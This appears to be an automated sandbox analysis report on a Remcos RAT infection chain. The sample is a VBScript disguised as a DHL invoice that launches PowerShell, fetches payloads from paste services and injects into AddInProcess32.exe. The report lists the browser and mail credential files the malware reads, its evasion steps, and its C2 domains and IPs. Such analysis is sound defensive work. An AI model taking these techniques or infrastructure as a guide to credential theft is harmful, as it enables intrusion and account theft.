                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,15_2_10002264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041B69E GetUserNameW,20_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,20_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0041739B GetVersionExW,21_2_0041739B
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3340320354.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data20_2_0040BA4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\20_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db20_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: ESMTPPassword23_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3

                      Remote Access Functionality

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DGYVFK
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DGYVFK
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DGYVFK
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3340320354.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe20_2_0040569A
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information321
                      Scripting
                      Valid Accounts11
                      Native API
                      321
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      1
                      Exfiltration Over Alternative Protocol
                      1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      1
                      Deobfuscate/Decode Files or Information
                      211
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts32
                      Command and Scripting Interpreter
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      2
                      Credentials in Registry
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Windows Service
                      2
                      Software Packing
                      3
                      Credentials In Files
                      4
                      File and Directory Discovery
                      Distributed Component Object Model211
                      Input Capture
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell
                      Network Logon Script321
                      Process Injection
                      1
                      DLL Side-Loading
                      LSA Secrets38
                      System Information Discovery
                      SSH3
                      Clipboard Data
                      1
                      Remote Access Software
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder
                      1
                      Bypass User Account Control
                      Cached Domain Credentials131
                      Security Software Discovery
                      VNCGUI Input Capture2
                      Non-Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal Capture213
                      Application Layer Protocol
                      Exfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading
                      Proc Filesystem3
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation
                      Network Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd321
                      Process Injection
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533046 Sample: DHL_Shipping_Invoices_Awb_0... Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 74 pastebin.com 2->74 76 paste.ee 2->76 78 6 other IPs or domains 2->78 104 Multi AV Scanner detection for domain / URL 2->104 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 112 21 other signatures 2->112 11 wscript.exe 1 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        signatures3 110 Connects to a pastebin service (likely for C&C) 76->110 process4 signatures5 122 VBScript performs obfuscated calls to suspicious functions 11->122 124 Suspicious powershell command line found 11->124 126 Wscript starts Powershell (via cmd or directly) 11->126 128 2 other signatures 11->128 18 powershell.exe 7 11->18         started        21 powershell.exe 14->21         started        23 conhost.exe 14->23         started        25 powershell.exe 16->25         started        27 conhost.exe 16->27         started        process6 signatures7 92 Suspicious powershell command line found 18->92 94 Self deletion via cmd or bat file 18->94 96 Tries to download and execute files (via powershell) 18->96 102 3 other signatures 18->102 29 powershell.exe 14 18 18->29         started        34 conhost.exe 18->34         started        98 Writes to foreign memory regions 21->98 100 Injects a PE file into a foreign processes 21->100 36 AddInProcess32.exe 21->36         started        38 conhost.exe 21->38         started        40 AddInProcess32.exe 25->40         started        42 conhost.exe 25->42         started        process8 dnsIp9 86 sbelegi.com.br 128.201.75.197, 49711, 80 MEGAPROVEDOR-SERVICOSDEINTERNETLTDA-MEBR Brazil 29->86 88 desckvbrat.com.br 191.252.83.213, 21, 49704, 49705 LocawebServicosdeInternetSABR Brazil 29->88 90 paste.ee 188.114.97.3, 443, 49706, 49709 CLOUDFLARENETUS European Union 29->90 72 C:\Users\user\AppData\Roaming\...\uxrsw.ps1, Unicode 29->72 dropped 148 Self deletion via cmd or bat file 29->148 150 Adds a directory exclusion to Windows Defender 29->150 44 powershell.exe 11 29->44         started        48 cmd.exe 11 29->48         started        50 powershell.exe 23 29->50         started        52 3 other processes 29->52 152 Detected Remcos RAT 36->152 file10 signatures11 process12 dnsIp13 84 pastebin.com 104.20.3.235, 443, 49744, 49776 CLOUDFLARENETUS United States 44->84 130 Writes to foreign memory regions 44->130 132 Injects a PE file into a foreign processes 44->132 54 AddInProcess32.exe 44->54         started        134 Suspicious powershell command line found 48->134 136 Wscript starts Powershell (via cmd or directly) 48->136 138 Loading BitLocker PowerShell Module 50->138 59 WmiPrvSE.exe 2 50->59         started        140 Creates autostart registry keys with suspicious values (likely registry only malware) 52->140 signatures14 process15 dnsIp16 80 janbours92harbu04.duckdns.org 172.111.213.72, 3981, 49775, 49788 WANSECURITYUS United States 54->80 82 geoplugin.net 178.237.33.50, 49787, 80 ATOM86-ASATOM86NL Netherlands 54->82 70 C:\ProgramData\remcos\logs.dat, data 54->70 dropped 114 Contains functionality to bypass UAC (CMSTPLUA) 54->114 116 Detected Remcos RAT 54->116 118 Tries to steal Mail credentials (via file registry) 54->118 120 7 other signatures 54->120 61 AddInProcess32.exe 54->61         started        64 AddInProcess32.exe 54->64         started        66 AddInProcess32.exe 54->66         started        68 AddInProcess32.exe 54->68         started        file17 signatures18 process19 signatures20 142 Tries to steal Instant Messenger accounts or passwords 61->142 144 Tries to steal Mail credentials (via file / registry access) 61->144 146 Tries to harvest and steal browser information (history, passwords, etc) 64->146

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      DHL_Shipping_Invoices_Awb_0000000.vbs0%ReversingLabs
                      DHL_Shipping_Invoices_Awb_0000000.vbs5%VirustotalBrowse
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      paste.ee2%VirustotalBrowse
                      geoplugin.net0%VirustotalBrowse
                      janbours92harbu04.duckdns.org6%VirustotalBrowse
                      desckvbrat.com.br7%VirustotalBrowse
                      pastebin.com0%VirustotalBrowse
                      sbelegi.com.br0%VirustotalBrowse
                      ftp.desckvbrat.com.br8%VirustotalBrowse
                      janbours92harbu03.duckdns.org10%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://www.imvu.comr0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      http://www.imvu.com0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://aka.ms/pscore60%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://login.yahoo.com/config/login0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://crl.v0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                      http://desckvbrat.com.br7%VirustotalBrowse
                      http://sbelegi.com.br0%VirustotalBrowse
                      http://paste.ee2%VirustotalBrowse
                      janbours92harbu03.duckdns.org10%VirustotalBrowse
                      http://ftp.desckvbrat.com.br8%VirustotalBrowse
                      https://github.com/Pester/Pester1%VirustotalBrowse
